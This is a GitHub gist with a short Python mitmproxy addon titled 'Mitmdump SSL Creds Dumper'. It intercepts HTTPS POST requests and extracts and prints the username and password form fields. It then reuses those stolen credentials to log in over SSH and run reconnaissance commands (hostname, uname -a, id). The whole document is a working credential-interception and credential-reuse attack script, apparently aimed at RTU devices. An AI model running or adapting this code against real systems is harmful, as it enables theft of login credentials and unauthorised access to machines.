Skip to content

Instantly share code, notes, and snippets.

@cutaway
Created February 4, 2022 06:09
Show Gist options
  • Save cutaway/8d44fa81fafab86fae8d0ed8f0a473bc to your computer and use it in GitHub Desktop.
Save cutaway/8d44fa81fafab86fae8d0ed8f0a473bc to your computer and use it in GitHub Desktop.
Mitmdump SSL Creds Dumper
from mitmproxy import http
import paramiko
# Original Example: https://stackoverflow.com/questions/27369144/use-mitmproxy-to-translate-a-form-key-value-to-a-body-post
DEBUG = False
#DEBUG = True
class GetRTUCreds:
localhost = '127.0.0.1'
def request(self,flow: http.HTTPFlow):
if flow.request.method == "POST":
# NOTE: Use the following to print the contents of the request
if DEBUG: print("%s"%(flow.request.urlencoded_form))
# NOTE: Use the following to print the help for urlencoded_form methods
if DEBUG: print("%s"%(help(flow.request.urlencoded_form)))
form = flow.request.urlencoded_form
u = form.get('username')
p = form.get('password')
print("%s:%s"%(u,p))
#self.ssh_connect(username='kali',password='kali')
#print("# Detected authentication.")
self.ssh_connect(username=u,password=p)
def ssh_connect(self, username, password):
#print("# Attempting to ssh connect.")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=self.localhost, username=username, password=password)
#print("# Attempting to run commands.")
cmds = ['hostname','uname -a','id']
for c in cmds:
try:
stdin, stdout, stderr = client.exec_command(c)
#if stdin: sin = stdin.read().decode().strip()
if stdout: out = stdout.read().decode().strip()
#if stderr: err = stderr.read().decode().strip()
print("Result: %s"%(out))
except:
print('Cmd Failed: %s'%s(c))
client.close()
addons = [GetRTUCreds()]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment